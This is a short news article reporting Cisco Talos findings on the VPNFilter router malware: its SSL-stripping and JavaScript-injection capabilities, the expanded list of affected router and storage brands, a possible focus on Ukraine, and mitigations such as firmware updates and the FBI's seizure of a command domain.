Data-stealing router malware bypasses web encryption

It also inserts hostile code and targets devices on the network.

A recently discovered strain of router malware appears to be much worse than thought. Cisco Talos has learned that VPNFilter can not only render devices unusable, but can bypass the SSL encryption you often see on the web. A module in the malware intercepts outgoing web requests to turn them into non-secure (that is, basic HTTP) requests, helping it steal sign-ins and other sensitive data when possible. It can also use man-in-the-middle attacks to insert hostile JavaScript into outside websites, and target devices beyond the router itself, such as PCs on the local network.

The rogue software targets many more devices than first thought, too. While a late May report focused on a handful of routers and network storage devices from Linksys, MikroTik, Netgear, QNAP and TP-Link, the vulnerability is now known to affect both more models from those brands as well as ASUS, D-Link, Huawei, Ubiquiti, Upvel and ZTE.

Significantly, VPNFilter isn't just infecting every device it can. Symantec noted that it's "particularly interested" in targets in Ukraine, suggesting that Russia or another politically motivated actor might be involved.

There are ways to minimize or eliminate the threat. MikroTik and Netgear note that newer firmware updates should protect against VPNFilter, and the FBI has seized a domain the malware used for its command and control system. QNAP has a malware removal tool. However, the scale of the threat is more than a little disconcerting, and there are many people and companies that rarely upgrade their firmware. It's possible that a new variant could switch to a new domain and infect more devices with little resistance.